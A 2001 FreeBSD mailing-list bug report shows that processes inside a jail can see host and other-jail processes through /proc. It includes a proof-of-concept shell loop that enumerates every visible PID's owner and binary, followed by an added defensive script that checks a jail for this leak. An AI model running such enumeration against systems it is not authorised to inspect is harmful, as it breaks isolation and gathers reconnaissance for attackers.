Date: Mon, 29 Oct 2001 18:36:26 +0100
From: opr
To: freebsd-hackers@freebsd.org
Subject: jail's /proc
Message-Id: <20011029183626.36f8e686.opr@bsdaemon.be>

Hello,

I really have no clue if I should mail this to you guys, but we've found some issues in the jail's /proc. We were able to find information about processes running outside the jail, or running in other jails.

E.g. when I run sshd in the host system, and it has PID 655, I can log in on the jail, and by executing "ls -l /proc/665/file" I can see what binary is running on PID 655. So any user of the jail system can see what processes you run on that server.

I'm running FreeBSD 4.4-RELEASE on an i386.

greetz,
Pieter Danhieux

Proof of concept shellscript:

#!/bin/sh
# Walk the PID range and report every /proc/<pid>/file visible from inside the jail.
_COUNT=0
while [ $_COUNT -le 65000 ]; do
    if [ -f /proc/$_COUNT/file ]; then
        # Owner and binary path are cut out of the "ls -l" output.
        _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`
        _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`
        echo "PID= $_COUNT USER= $_USER PROC= $_PROC"
    fi
    _COUNT=`expr $_COUNT + 1`
done

----------------- [www.bsdaemon.be] -----------------
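
Added example, not part of the original post: a regression check an administrator could run inside a jail to confirm whether procfs exposes PIDs that do not belong to it, which is the leak reported above. The function name `foreign_procfs_pids`, the allowed-PID file and the sample tree built in `demo` are assumptions made for illustration, as is the premise that `<pid>/file` is a symbolic link to the executable.

```sh
#!/bin/sh
# Added example (not from the original post): list procfs entries that are
# visible from inside a jail but do not belong to it.
#
# foreign_procfs_pids PROCFS_ROOT ALLOWED_PIDS_FILE
#   ALLOWED_PIDS_FILE holds one PID per line: the processes the jail owns
#   (assumption: the caller collects these, e.g. from the jail's own ps output).
#   Prints "<pid> <executable>" for every other PID found under PROCFS_ROOT.
#   Returns 1 if at least one foreign PID is visible, 0 otherwise.
foreign_procfs_pids() {
    procfs_root=$1
    allowed_file=$2
    leaked=0
    for entry in "$procfs_root"/[0-9]*; do
        [ -d "$entry" ] || continue               # also skips an unmatched glob
        pid=${entry##*/}
        case $pid in *[!0-9]*) continue ;; esac   # numeric names only
        grep -qx "$pid" "$allowed_file" && continue
        # Assumption: <pid>/file is a symlink to the running binary.
        target=$(readlink "$entry/file" 2>/dev/null) || target="(unknown)"
        echo "$pid $target"
        leaked=1
    done
    return $leaked
}

# Constructed sample tree standing in for a jail's /proc: PID 700 belongs to
# the jail, PID 655 is the host's sshd from the report.
demo() {
    tmp=$(mktemp -d) || return 2
    mkdir -p "$tmp/proc/655" "$tmp/proc/700"
    ln -s /usr/sbin/sshd "$tmp/proc/655/file"
    ln -s /bin/sh "$tmp/proc/700/file"
    echo 700 > "$tmp/allowed"
    if foreign_procfs_pids "$tmp/proc" "$tmp/allowed"; then
        echo "procfs shows only the jail's own processes"
    else
        echo "LEAK: procfs exposes processes from outside the jail"
    fi
    rm -rf "$tmp"
}
demo
```

Inside a real jail the first argument would be `/proc`; a non-zero return after a kernel or configuration change means the jail can still see foreign processes.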